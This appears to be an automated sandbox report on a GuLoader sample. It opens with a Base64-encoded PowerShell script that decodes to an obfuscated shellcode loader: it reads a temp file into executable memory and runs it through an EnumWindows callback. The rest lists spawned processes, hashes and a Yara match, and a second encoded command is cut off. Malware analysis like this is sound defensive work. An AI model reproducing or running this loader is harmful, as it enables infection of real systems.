gAHMAbwBlAGsAbwBlAHMAawB2AGkAIABkAG8AcgB0ACAAUgBlAG4AZABlAGcAcgBhAHYAbgAgAA0ACgAjAE4AaQB2AGUAYQA1ACAAYwBvAG4AYwBsAHUAcwBpAGIAIABTAFAARQBFAFIASQBOAEcAIABTAHUAcABlAHIAbwBmAGYAaQBjACAARwBhAG4AZwBsAGkAbgBqAGUAcwAzACAAYQBzAGMAaAAgAFIAZQBzAGkAZABlAG4AIABTAFQASgBGAEkATABUAFIARQAgAHUAbgBpAHQAdABlACAATABFAEcARQBSAEUARABFACAAcwB0AGUAcgAgAGkAZABlAGUAcgAgAE8AcABrAGwAYgBiAGUAbgB2AG4AIABTAGUAcgBlAGEAbgAgAHMAbABhAHYAZQAgAA0ACgAjAHQAeQByAGEAbgBuAGkAIABiAG8AZwBlAG4AcwAgAEgAQQBOAEQARQBMAFMARgBPAFIAIABFAHAAaQBrAGUAcgAgAFYARQBEAFIATwBFACAAUABhAHIAZQAgAEkAbgB0AHIAdgBhAHMAIABQAGUAdAByAG8AZwBlAG4AeQAyACAAQQBzAHMAZQBuAGQAZQBuACAAUwB1AGcAYQByAGkAbgBnACAAaQBjAGgAdABoAHkAbwBzAGEAdQAgAA0ACgAjAEwAYQBuAGQAbQBhAHMAcwA0ACAAUgBiAGEAcgBlAHMAcAA2ACAAUAByAGUAYwBlAGwAZQBiAHIAYQAgAFAAYQBzAGkAZwBhAG4AZwBnADUAIABVAG4AcgBlAG4AdQBuAGMAIABCAEEARwBTAFQAIABTAFQASgBHAFIATgAgAFUAbgBwAHIAZQBmAGUAcgAgAFQATQBSAEUAIABMAG8AZAB0AHIAawBuAGkAbgBnACAAQwBvAG4AdgAxACAAVgBBAEUAUgBOAEUAIABoAG8AbABhACAAZQB4AHAAZQByAGkAbQBlACAAVAB5AGsAawBlAHMAcABsAGEAZAAxACAARQBVAFAATAAgAFAAbwBzAHQAcAByAG8AagBlACAAUABsAG8AdgBmAHUAcgBlAHMAOAAgAEEAcgBiAGUAagBkADMAIAB0AG8AYgBhAGsAIABSAGEAZABpAG8ANgAgAEEAUwBQAEkAUQAgAEMAbwBuAHIAYQBkAGgAZQBrADEAIABTAG4AYQByAGkAOQAgAEkAbQBpAHQAYQB0AGkAOAAgAEsAYQBnAGUAbQBhAGQANwAgAEEAZgBnAHUAZABzACAADQAKACMAVQBOAFAASAAgAEYAcgBlAHIAOAAgAFIAZQBkAGkAIABIAG8AdgBlADQAIABEAEEAVABBAEIAQQBTAEUAUwAgAFQASQBMAEIAQQBHACAAUgBvAHQAdABlAHIAbgBlACAAcwBhAG4AcwBlAG8AcgBnAGEAbgAgAHMAcQB1AGkAcgB0ACAATwBtAG8AcABsAGEAdABvAHMAYwAgAFIAcwBrAG4AIABLAHkAbABsADkAIABUAE8ATgBFAEQAUwBLAEkARgAgAEMAbwBhAGMANwAgAHMAcABvAG4AZwB5AHMAIABLAGEAdAB0AGUANwAgAEgAeQBkAHIAbwB0AGgAZQByAGEANgAgAEMATwBNAFAAUgBFAEgARQAgAFMAYQB4AG8AIABQAEEAUABJAFIAVAAgAGIAYQByAHkAZQAgAHIAYQB0AG8AbgBmAG8AcgBlAGQAIAANAAoAIwB1AG4AZABlACAAQQBNAFAASABJAFAATwBEACAAUwBwAHIAbwBnAGYAbwA2ACAAYgBvAG4AZAAgAEEATABUAFMAVAAgAEMAaABhAG4AZwBvAGEAbgBhAG4AIABQAEEAVQBSAE8AUAAgAEYAbwByAG0AaQBuACAATABvAHYAcAByAGkAcwBmAHIAZQA3ACAARQB4AGMAbwBjAHQAaQA2ACAAVABBAEsAVABTACAAQQBuAHQAaQBlAG0AcABpAHIAaQA3ACAARwBhAHIAbgBlAHIAaQBuAGcAZQAgAFAATABBAE4AWABUACAASwBOAEkAVgBNACAAdgByAGQAaQByAGUAZAB1ACAAUABvAGwAeQBjAGgAbwByACAAZQBsAGkAcwBvAHIAcwBoACAAVgBpAHQAZQBzAHMAZQAyACAAcwBlAHMAcwBpACAAQgBvAHIAdABsAGUAZAB0AGUAIABLAEEATgBEAEkAUwBFAE4ASwAgAEcAaQBuAHMAaQA0ACAASwBVAE4AUwBUAE0AVQBTAEUAIABQAGEAcgBlAHIAaQBuACAAUwBRAFUAVQBTAEgATwBLAFUATAAgAG0AYQB0AHIAaQBjAHUAbABhAHQAIABEAGkAbQBzAHMAcwBtADQAIABTAEUAUwBUAEkAQQBOACAAUgBlAGgAYQBiAGkAbABpAHQAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAEYAbwByAGwAeQA5ADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGcAZABpADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0ARgBvAG4AdABzAEEAKABzAHQAcgBpAG4AZwAgAEYAQQBCAEwARQAsAHUAaQBuAHQAIABLAG8AbgBnAGUAaAB1AHMALABpAG4AdAAgAEQAaQBzAHYAbwBpAGMAZQBhAG8ALABpAG4AdAAgAEYAbwByAGwAeQA5ADAALABpAG4AdAAgAE0AYQBpAG4AYQBzAGMAaABlACwAaQBuAHQAIABNAG8AcgBhAGwAaQB0ADEALABpAG4AdAAgAFQATwBSAEUAQQBEAE8AKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBLAEUAUgBOAEUATAAzADIAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIAQwByAGUAYQB0AGUARgBpAGwAZQBBACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAGEAYwAoAFsATQBhAHIAcwBoAGEAbABBAHMAKABVAG4AbQBhAG4AYQBnAGUAZABUAHkAcABlAC4ATABQAFMAdAByACkAXQBzAHQAcgBpAG4AZwAgAEYAQQBCAEwARQAsAHUAaQBuAHQAIABLAG8AbgBnAGUAaAB1AHMALABpAG4AdAAgAEQAaQBzAHYAbwBpAGMAZQBhAG8ALABpAG4AdAAgAEYAbwByAGwAeQA5ADAALABpAG4AdAAgAE0AYQBpAG4AYQBzAGMAaABlACwAaQBuAHQAIABNAG8AcgBhAGwAaQB0ADEALABpAG4AdAAgAFQATwBSAEUAQQBEAE8AKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAEYAbwByAGwAeQA5ADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAHIAdQBzAHQAbgBpAG4AZwBlAHIALABpAG4AdAAgAFAAbwBpAG4AdABzAG0AZQBuAGgALAByAGUAZgAgAEkAbgB0ADMAMgAgAEYAbwByAGwAeQA5ACwAaQBuAHQAIABXAE8AUgBLAFMASABJAFAATQBFACwAaQBuAHQAIABGAG8AcgBsAHkAOQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAPQAiAFIAZQBhAGQARgBpAGwAZQAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAEMARABBAEMAKABpAG4AdAAgAFAAbwBpAG4AdABzAG0AZQBuAGgAMAAsAHUAaQBuAHQAIABQAG8AaQBuAHQAcwBtAGUAbgBoADEALABJAG4AdABQAHQAcgAgAFAAbwBpAG4AdABzAG0AZQBuAGgAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAUABvAGkAbgB0AHMAbQBlAG4AaAAzACwAaQBuAHQAIABQAG8AaQBuAHQAcwBtAGUAbgBoADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAEkAbgB0AFAAdAByACAAUABvAGkAbgB0AHMAbQBlAG4AaAA1ACwAaQBuAHQAIABQAG8AaQBuAHQAcwBtAGUAbgBoADYAKQA7AA0ACgANAAoAfQANAAoAIgBAAA0ACgAjAEgATwBWAEUARABCAFkAIABWAEUATABTAEUAUwBNACAARQB2AGUAcgBlAGQAIABQAHIAbwBhAG0AYQB0AGUAdQAgAHAAYQBhAHMAawB5AG4AZAAgAEgAYQBhAG4AZABlAHYAZQBuACAAZgBvAHIAbABiAGUAcgBuACAAYgBlAHQAaABhAG4AawBpAG4AZwAgAGUAdQByAG8AdgBpAHMAaQBvACAARgBvAHIAdQBkAGQAaQBzACAADQAKACQARgBvAHIAbAB5ADkAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwATwBWAEUAUgAuAGQAYQB0ACIADQAKACMAYgBvAG8AawBsAGkAZgB0AG0AIABGAG8AcgBzAGEAZQBkAGUAdQAgAFUAbgBkAGUAcgBzACAAYgBvAHIAdABmAG8AcgBrACAAZABlAHQAZQAgAEwAYQBtAHAAYQAgAEIAbABhAG4AYwBoAGUAZAA2ACAAVABhAHcAcABpAGUAbQBhAHMAdAAgAHQAaQBsAHMAdABhAG4AZAAgAGsAYQByAHQAbwBuAG4AIABCAGUAdgBpAGwAZwBlAG4AZAAxACAAQgBhAGcAZwByAHUAbgBkADEAIABUAGEAbgB0AGEAbABpAHMAZQAyACAAQgBsAG8AZAB0ADMAIAANAAoAJABGAG8AcgBsAHkAOQAzAD0AMAA7AA0ACgAkAEYAbwByAGwAeQA5ADkAPQAxADAANAA4ADUANwA2ADsADQAKACQARgBvAHIAbAB5ADkAOAA9AFsARgBvAHIAbAB5ADkAMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKAAtADEALABbAHIAZQBmAF0AJABGAG8AcgBsAHkAOQAzACwAMAAsAFsAcgBlAGYAXQAkAEYAbwByAGwAeQA5ADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBTAHYAawBsAGkAbgBnAGUAcgBuADEAIABiAGwAYQBuAGsAIABHAHUAdAB0AGUAcgBzAHMAZQAgAFUASABZAEcARwBFAE4AUwBJAEwAIABVAGYAbwByAGQAIABSAGkAZwBzAGcAcgBlACAAQgBMAE8ASwBOAEkAIABFAFYAQQBOAEUAUwAgAFQAcgBhAGMAdABhAGIAIABKAHUAbABlAG4AZQBnACAAYgBuAGYAYQBsAGQAZQBsAHMAIABNAEkAUwBMACAAbwBtAHMAdAAgAFQAZQBzAHQAaQBrAGwAZQBuADYAIABGAGkAbABtACAAcABhAG0AcABhAG4AZwBvAGsAbwAgAA0ACgAkAEYAbwByAGwAeQA5ADQAPQBbAEYAbwByAGwAeQA5ADEAXQA6ADoAVgBpAGEAYwAoACQARgBvAHIAbAB5ADkAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBMAGUAbgBzAGEAZgB0AGEAbABlACAATgBhAHQAdQA4ACAARgBPAFIAUwBBAE0ATABJAE4AIABJAG4AawBvACAAUwBVAEIATQBPAEQARQBBACAAZQBsAGUAZgAgAGMAYQB0AGEAcgBpAG4AZQBzACAAQgByAGEAbgBjAGgAZQBvAHIAIABOAG8AbgBmAGEAbgA1ACAATQBpAHMAdwA3ACAAQgBpAGwAbAAgAHoAbwBlAGYAbwByACAAUABhAGwAYQBlACAASwBoAGEAcgB1AG4AIAByAGUAdAByAGkAYgB1AHQAaQAgAFMAdQBmAGYAcgBhAGcAZQB0ACAATABpAG4AcwBlAHIAbgA3ACAARQBrAHMAaQBsAGUAcgA5ACAAYwBhAHQAYQBsAHkAcwB0AGwAZQAgAFYAYQBnAGkAZgAgAFMAawByAGwAbABlAHIAYQBuAGkAIABSAEUAVABTAEEAIABUAGgAcgBvAGMAawBzAGkAIABJAG4AZQBmAGYAaQBjAGEAYwA4ACAAZwBlAG4AZQByAGEAIABVAGwAdgBlAHUAbgBnACAATgBpAGcAaAB0AHcAYQByAGQAbgAyACAASwBWAEEARABSAEEAVABUAEEAIAANAAoAJABGAG8AcgBsAHkAOQA1AD0AMAA7AA0ACgAjAEwAYQBuAGQAcwByAGUAdABwAG8ANAAgAE8AcABzAHYAdQBsADMAIABLAG8AbgB0AHIAYQAgAHAAcgBlAGQAZQAgAEIAUgBBAE4ARABTAEwAIABTAEsATwBWAEQAQQBIAEwAVQAgAGQAZQBjAGEAbgBhAGwAcwBhACAAawBhAG8AbABpAG4AcwBhACAAZwByAHUAdAB0AGUAZABlACAAUwB0AHIAbQBmAG8AcgBiACAAUABzAGUAdQBkADYAIABIAGUAcAB0AGEAcgBjADgAIABTAGUAYwByACAAYgBpAGwAbABvAHcAaQBuACAAYgBhAHQAYwAgAEYASQBUAFQAQQBCAEwARQAgAFAAaQBuAGsAbgBlAHMAcwBlACAAUABTAE8AQwBJAEQAQQBFAEMASAAgAA0ACgBbAEYAbwByAGwAeQA5ADEAXQA6ADoAQwBEAEEAQwAoACQARgBvAHIAbAB5ADkANAAsACQARgBvAHIAbAB5ADkAMwAsADUAOQAxADcAOQAsAFsAcgBlAGYAXQAkAEYAbwByAGwAeQA5ADUALAAwACkADQAKACMAdABoAGUAbQAgAFMAUABBAFQAQQBMACAAUwB0AGEAbABsAGUAcgBvADgAIABQAGkAcwB0AGkAIABPAGUAZABpAGMAbgAgAEMAQQBOAE4ASQBCAEEATAAgAEwAeQBrAGsAZQBkAGUAcwBzADcAIAB0AHIAZQBkAGkAdgBlAGEAYQByACAAUgBlAGoAcwB0AGYANAAgAFMAVQBQAFAARQBUAEUAUgBSACAARgBsAGUAcgBkAG8AYgAxACAASQBuAG8AcgBkAGkAbgA1ACAASwBOAEIARQAgAFMAdABhAHQAaQAgAFIAZQBzAHQAYQB1AHIAYQB0ADgAIABMAGkAdABoAHkAcwA4ACAATABFAFQAVABSAE8AIABsAGkAZwByAG8AaQBuAHMAcgAgAEQAcgBiAHQAIABkAGUAZwBhAHMAcwBlAHMAIABCAGwAcgBlAHIAbwA4ACAADQAKAFsARgBvAHIAbAB5ADkAMQBdADoAOgBFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKAAkAEYAbwByAGwAeQA5ADMALAAgADAAKQANAAoADQAKAA==
                                    Imagebase:0x170000
                                    File size:433152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Reputation:moderate

                                    Target ID:3
                                    Start time:14:00:43
                                    Start date:12/05/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6fad10000
                                    File size:875008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate

                                    Target ID:4
                                    Start time:14:01:05
                                    Start date:12/05/2022
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.cmdline
                                    Imagebase:0xe10000
                                    File size:2141552 bytes
                                    MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Reputation:moderate

                                    Target ID:5
                                    Start time:14:01:06
                                    Start date:12/05/2022
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DC.tmp" "c:\Users\user\AppData\Local\Temp\ppgnlr3u\CSC3E3BD6AE19504271A02C9239AA6C641F.TMP"
                                    Imagebase:0x930000
                                    File size:46832 bytes
                                    MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate

                                    Target ID:9
                                    Start time:14:01:21
                                    Start date:12/05/2022
                                    Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                                    Imagebase:0x980000
                                    File size:480256 bytes
                                    MD5 hash:7871873BABCEA94FBA13900B561C7C55
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000000.4302405352.0000000000630000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:moderate

                                    Target ID:10
                                    Start time:14:01:32
                                    Start date:12/05/2022
                                    Path:C:\Windows\SysWOW64\wscript.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Touchb.vbs"
                                    Imagebase:0xac0000
                                    File size:147456 bytes
                                    MD5 hash:4D780D8F77047EE1C65F747D9F63A1FE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate

                                    Target ID:11
                                    Start time:14:02:08
                                    Start date:12/05/2022
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBtAGUAcwBvACAAZABpAHQAdABvAGcAIABzAHQAagBlAHIAdABoAGEAZwBlACAAUAByAGUAdgBhAHIAaQBjAGEAdAAxACAAUAB5AHIAbwBsADYAIABkAGUAbAB1AG0AaQBuAGkAIABUAGEAcwB0AGUAYQByADcAIAB0AHIAbwBwAG8AIABlAG4AZwByACAAbgBvAG4AcgBlAHAAZQBuAHQAYQAgAA0ACgAjAFMAbQBpAHQAdAB5ADEAIABTAFAAUgBFAE4ARwAgAFUATgBWAEkAUwAgAEEAbABsAGUAcgBoAHYAIABBAHIAYwBoAGkAcAA5ACAAUgBJAE4ARwBNAFIASwBOAEkAIABVAG4AYwBvAG4AOQAgAEoARQBOAEIAUgBZACAARQBqAGEAawB1AGwAZQAgAFMAVABKAEUAUgAgAEsATwBNAE0AVQBOAEkASwAgAFMAbwByAHQAawA4ACAAcABoAGEAZQAgAFUAcQB2AHMAeQAgAE0AbwBuAG8AcAAzACAAQwBvAHUAbgB0AGUAcgBjAGwAMQAgAGIAYQBhAGwAYQBtAGIAcwAgAEUAeABwAGwAbwBzAGkAYgBsACAARQBQAEkARwBSACAAQwBlAHAAaABhAGwAbwBoAHUAbQAgAHQAZQBnAG4AdAAgAEcAUABTAEUATQBVAEwAUwAgAEEAZgBsAGEAYQBzADYAIABBAHMAYgBrADYAIAANAAoAIwBhAGIAaQBkAGkAIABQAGUAbgBnADkAIABhAHAAaABhACAAQwBhAHUAbABrAGUAcgBzACAAVABSAEYARgBFACAAVAB5AHAAaABvAG8AbgB0AG8AMwAgAGsAcgBhAHAAaQBuAGEAZgAgAEUAbgBsAGkAZwBzAHQAaQAyACAAUwBhAG4AawB0AGgAYQBuAHMAIABHAGUAbgBuAGUAbQA4ACAAQwBlAGwAaQBlAGMANgAgAEsAYQB0AGoAIAANAAoAIwBFAHAAaQBsAGUAcABzAGkAZQBuACAAUwBFAE0ASQBTAE8ATABVACAAcwBwAHIAZQBkAG4AaQBuACAATQBFAFQASABZACAAUABhAHIAYQBtAGUAIABCAHIAbgBlAGgAYQB2AGUAMgAgAEcARQBSAE0AQQBOAEkAUwBUACAARABSAEUAVABTAFMAIABFAE4AUwBQAE8AUgBFAFQASAAgAFMAdABlAGQAbQBvAGQANwAgAFMAdgBvAHYAbABzAHkAcgBlACAAQgBvAHIAZwBlAHIAcgAgAEsAbwBsAHAAbwByAHQAMQAgAHAAbABlAHUAcgBvAHQAIAANAAoAIwBiAG8AbgBzAGEAaQAgAFAAcwBlAHUAZABvACAAZgByAGkAdABpAGQAcwBjAGUAbgAgAFQARQBBAFQARQBSAEcATgAgAFAATABBAE4ARQBSAFMAIABWAEkATgBEAE0AIABTAHAAYQBsAHQAZQAgAFQAYQBiAGUAbAAyACAAQQBtAGIAYQBkAGUAZQBkAGkAZQAgAEMAaQBuAGQAZQByAHMAYgBhAG4AIABDAG8AYQB0AHQAMwAgAEMASABSAE8ATQBBAFQAIABjAGEAcgBsACAAUwB0AGkAZgB0ADEAIABzAHQAdgBmAG4AIABLAG8AbQBtAHUAbgBhADMAIABSAFIAVABBAE4AIABOAG8AbgBvAGkAbAAgAA0ACgAjAHMAZQBwAHQAZQBuAGEAdAAgAFAAcwBlAHUAZABvAGEAbQBiADgAIABOAG8AbgByAGEAYwBpAGEAIABWAGwAZwBlAHIAZQBzAGsAMwAgAEQAbwBnAGgAbwAgAFAAcgBvAGcAcgBhAG0AbQAgAEYATABVAEcAVABTAEsAWQBEACAAYwBsAGEAdQBzAHQAIABTAEUATABWAEYASQBOACAADQAKACMAZABpAHMAcABlAG4AcwAgAEEARgBGAEEATABEAFMAUAAgAFAAbABuAGUAcgBuAGUAcgAgAEcAbwByAGQAeQBrAG4AMQAgAEIAaQBvAGUAbAAgAFIAaABpAHoAIABOAG8AbgBhAGQAagBhADkAIABCAHIAaQBzADIAIABTAFQAVQBEACAAawBvAHIAcABvAHIAbABpAGcAdAAgAEMAaABhAHIAYwB1AHQAaQAyACAATQBhAGwAdABpAG4AZwBwAGUANgAgAFMAaQBrAGsAZQByAGgAMwAgAFUATgBJAFQASQBOAEcASQBOACAAZABpAHMAZQBuAHMAIAANAAoAIwBTAFAASQBTACAAcwB0AHIAeQBrAG4AaQAgAFQAcgBlAGEAcwB1AHIAZQAyACAAZgByAGUAZQB6ACAARABpAHMAbwByAGQAZQAgAEMAaQBmAGYAZQByAGYAbAAgAG0AZQB0AGEAZwBlAHMAIABVAHMAdABlAG0AcAAgAGUAZgB0AGUAcgBrAG8AbQBtACAAUwB5AG4AcwBtAHMANAAgAEwATgBTAEwAQQBWAEUAUwBSACAAQwBhAHQAcwA0ACAAcwBvAHYAcwAgAFcAaQBuAHMAIABQAHIAZQBjAGUAcAB0AGEANwAgAFQAQQBSAFMATwBNAEEATAAgAE8AYgBzAHQAZQByAG4AYQBzAGkANAAgAEUARgBUAEUAUgBUAFIAIABCAGwAZQBzAGsAdQBkADIAIAANAAoAIwB3AG8AbwBsAGUAbgBzAHIAIABQAEwATwBDAEUASQBGAE8AUgBNACAAUgBhAHUAbgBvACAAVABZAFAARQBSACAAaQBuAG4AdQBlAG4AZABvACAAUgBBAFAAUAAgAEIAbwBnAHMAdABhAHYAawAgAHUAYgBlAHMAIABBAGIAcwBpAG4AdABoACAARgBvAHIAcwBrAG4AaQBuACAASABPAFQARQBMAFYAUgBUACAAUwBrAGkAbgBuACAAYgBlAGQAcgBpAGYAdABlAG4AIABCAFIATwBLACAAZgBvAHIAcwBrAHUAZABzAGIAIABNAGkAcwBpACAAQQB1AG0AYQA2ACAATQBvAHMAcwBlAHIAbgBlAHMAIAANAAoAIwBIAGUAbQBpAGgAeQBwAGUAcgBpACAAQQBpAGsAbwBzACAAbQBhAGsAcgBvAGYAdQAgAHAAaQBsAGwAbQBhAGsAaQBuAGcAIABIAGEAYgBhAG4AZQByAGEAcwBkACAAVAByAG8AbAA2ACAAUgBZAEcAVABJAEsAQQBNAFAARQAgAFQAUgBGAEwARQBSAE4ARQBQAE8AIABtAG8AZABzAHQAYQBuAGQAcwAgAEQAeQBuAGEAbQBpACAAcAB1AGwAdgBpAG4AIABIAHkAcwB0AGUAcgBlAGMAdABvADEAIABNAHQAbgBpACAAYwBoAGEAcgB0ACAATABFAE0ATQBBAFQAQQBBAE4AIABLAG4AcwBrADYAIABmAGkAbABzAHQAcgB1AGsAdAAgAA0ACgAjAEsATwBFAFIAUwBMAEUAIABTAFQAWQBSAEUAVgBBAFIASQBBACAAQgBsAG4AZABlACAAUwBlAGQAaQBtADQAIABDAFIATwBTACAARABVAEUATABMAEUAUgBFACAAawByAHUAbQBtAGUAcwB1ACAAUABzAGUAdQBkAG8AcAAgAHMAaABlAHIAIABTAHQAYQBuAGQAaABhAGYAIABmAG8AcgB2AGUAIABTAGsAYQB0AHQAZQBhAGYAZABlACAAUgBFAFYARQBSAFMAQQAgAFQAUgBJAEwATABJAE8ATgBUAEEAIABQAHIAcgBpAGUAIABIAHYAaQBkACAARABhAG0AcgAxACAAVQBuAHMAdQA5ACAAcwBhAG4AagBhAHMAcABlAHcAIABmAGwAeQBkAGUAIABMAEkATgBHAFUATwBWAEUAUgBTACAAUgBlAHMAcABvADkAIAANAAoAIwB0AGkAbABmACAAUwBoAG8AdABnAHUAbgBhAGYANgAgAFoAdQBuAGkAcwBzADIAIABiAHIAZQByAGEAawAgAEMAQQBOAEMAQQBOAFIAIABNAGkAbgBjAGUAcwAxACAAVAByAGkAdABhAG4AMwAgAEwAQQBCAE8AIABLAGEAbQBtAGUAcgBtAHUAIABjAG8AdQBuAHQAZQByAHIAIABmAG8AbABrAGUAZAByACAAVABlAGwAZQB0AGUAawBuADYAIABJAG4AZABpACAAYQBmAHMAYQB2AGUAcgBoACAAaQBuAGQAYgAgAFAATABBAE4ASwAgAEkAbgB0AGkAOAAgAEkAbgBmAGkAbgBpADUAIABhAG0AbgBpACAAUABSAE8AWABJAE0ASQBUACAAbwB0AGEAcwByAGkAcwB0AG4AaQAgAG0AbwB1AGwAZABzAGEAdQAgAA0ACgAjAG8AcgBnAGEAbgBlAHQAbABhAHMAIABOAG8AbgBpACAAbgB5AHQAdAAgAG0AdQB0AHUAIAB0AGEAawBuACAATwBtAGsAcgBlAGQAcwBlAG4AIABNAEkATgBJAE0AVQBNAFQAUgAgAE8AdgBlAHIAdABqADIAIABTAHQAcgBlAGEAawAgAFMAYQBuAHMAIABCAGkAbwBtAGUAMwAgAGYAYQBpAHIAawBlACAARwBlAGIAcgBvAGsAbgA2ACAAQgBlAG4AYQBlAGcAdAAxACAAUwBDAEgARQBOAEsATAAgAFUARABMAEkAQwBJACAAQwB5AGQAaQBwAHAAaQBkADMAIABMAGEAbgBnAHQAdQByAHMAYwA1ACAAdQB0AHQAaABlAGQAZQByAHMAIABiAGwAbwBrAHAAbwBzAHQAbQAgAFEAdQBhAHIANQAgAGgAbwBtAGUAbwB0AGgAZQByACAAQQBjAGsAbABlAHkAYwBlADgAIABzAGEAbQBtAGUAbgBwAHIAZQAgAGUAbABhAHMAdABpAG4AcwBoAGEAIAANAAoAIwBGAFIAUwBUAEUARABJAFIAIABVAEQATQBBAFQAUgAgAEsAaQBkAGwAaQBrACAARABJAEEARwBOAE8AIABXAEkATQBQAEkATgBFAFMAIABCAHIAbwBhAGQAbABpAG4AZwBzACAAUwBrAGkAbgBrAGUAcgAgAFAAcgBvAHQAbwBnAGkAbgAzACAARQBNAFAASQBSAEkAUwAgAFMAawBlAGUANQAgAE0AQQBOAEQAQQAgAFMAUABJAE4AQQBUAEYAIABTAHAAZQBjAGsAbABpAG4AZwB6ADYAIAANAAoAIwBSAGEAYQBkADMAIABTAE8ATgBHAFcAUgBJAFQAIABBAG4AdABoAHIAbwBwAG8AIABUAEUATABFAEYATwBOAFMAIABBAE0ARQBOAEEATgAgAFMAbQBlAGwAIABTAHQAYQBsAGQAYgByAGQAcgAgAEYAWQBSAFYAUgBLAEUAUgBFAFMAIABTAG4AaQBwAGUAbgBiADYAIABTAGkAdAB1ADkAIABBAHUAZABpAGUAbgAyACAAUgBpAGsAbwBjAGgAZQB0ACAASQBuAGMAdQByAHMAbgB5ACAARgBvAHgAdABhAGkAbABzAGQAYQAgAEEASwBLAFIAIABBAGsAaQBtAGgAdQBzADYAIABJAG4AcwB1AHIAcgBlADMAIABCAG8AdAB0AGwAZQBjAGEAcAAgAEUAdQBvAG4AeQBtAGkAbgBkACAAcABhAHAAeQByAG8AZwAgAFAAZQBkAGkAIABNAG8AcABpAHMAaABuAGUAcwBzACAAQQBmAGYAZQBqAGUAbgBkAGUAcwA2ACAAQgBSAEkARwBHAEUATgBEACAAQgBhAHIAcwBlACAAVQBuAGQAZQByAGsAIABQAFIATwBEAEQARQAgAEoARQBOAEwAIAANAAoAIwBiAGUAbgBlAGwAIABkAGkAcABwAGUAcgAgAFIAYQBkAHoAIABqAGUAYgBsAGkAawBzAGEAZgB0ACAAdABlAGsAbgBvAGsAcgBhAHQAIABTAHc